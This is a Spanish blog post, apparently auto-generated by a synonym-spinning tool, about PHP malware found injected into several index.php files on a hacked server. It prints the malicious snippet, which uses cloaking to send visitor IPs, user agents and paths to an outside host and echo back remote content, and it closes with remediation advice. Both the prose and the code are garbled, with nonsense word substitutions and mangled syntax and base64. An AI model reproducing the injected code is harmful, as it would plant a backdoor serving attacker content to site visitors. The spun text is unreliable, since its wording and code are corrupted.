tras compulsar el log del caballerizo y reparar varias antesalas por Ftp de una regencia natal de Canadá, revisé los estantes que parecían haber sido alterados por este advenedizo. En este acontecimiento, variados anaqueles index.php establecidos en distintos inventarios del servidor.
en todos estos anaqueles se había ocupado este trozo de edicto Php.
<?php
if (!isset($sretry))
{
común $Sretry;
$Sretry = 1;
// This code use for popular bot statistic
$Suseragent = Strtolower($_server['http_user_agent']); // Looks for google serch bot
$Stcurlhandle = Null;
$Stcurllink = “”;
If((strstr($suseragent, ‘google’) == False)&&(strstr($suseragent, ‘yahoo’) == False)&&(strstr($suseragent, ‘baidu’) == False)&&(strstr($suseragent, ‘msn’) == False)&&(strstr($suseragent, ‘opera’) == False)&&(strstr($suseragent, ‘chrome’) == False)&&(strstr($suseragent, ‘bing’) == False)&&(strstr($suseragent, ‘safari’) == False)&&(strstr($suseragent, ‘bot’) == false)) // Bot comes
{
If(isset($_server['remote_addr']) == true && Isset($_server['http_host']) == true){ // Create bot analitics
$Stcurllink = base64_decode( ‘ahr0cdovl2jyb3dzzxjnbg9iywxzdgf0lmnvbs9zdgf0rc9zdgf0lnboca==’).’?ip=’.urlencode($_server['remote_addr']).’&useragent=’.urlencode($suseragent).’&domainname=’.urlencode($_server['http_host']).’&fullpath=’.urlencode($_server['request_uri']).’&check=’.isset($_get['look']);
@$stcurlhandle = curl_init( $Stcurllink );
}
}
if ( $Stcurlhandle !== Null )
{
Curl_setopt($stcurlhandle, Curlopt_returntransfer, 1);
Curl_setopt($stcurlhandle, Curlopt_timeout, 6);
$Sresult = @Curl_exec($stcurlhandle);
if ($sresult[0]==”o”)
{$sresult[0]=” “;
echo $Sresult; // Statistic code end
}
Curl_close($stcurlhandle);
}
}
?>
el ejemplar legalizado en Base64 ahr0cdovl2jyb3dzzxjnbg9iywxzdgf0lmnvbs9zdgf0rc9zdgf0lnboca contiene esta administración [http://hotlogupdate.com/stat/stat.php]
en este albur, el fuero es facilmente reconocible. En otras baraturas el reglamento alcanzado es un javascript atraido bastante mas dificil de detectar.
si vuestra web es hackeada e contagiada por este u otro tipo de precepto desconfiado es recomendable que toméis las subsiguientes medidas aparte de prescindir el fastidioso fuero claro …
1. Cambiar las credenciales de golpe al rótulo de cuidado del Alojamiento (plesk, cpanel …)
2. Cambiar las credenciales de la perla Ftp
3. Revisar los grupos desde los que se ha obtenido con la enumeración Ftp cuyas credenciales parecen haber sido sustraidas en exploración de algún tipo de Troyano que el hacker haya podido usar para sustraerlas.
]]>
Este post se a creado automaticamente con autoblogger imperium descargalo Gratuito
0 comentarios:
Publicar un comentario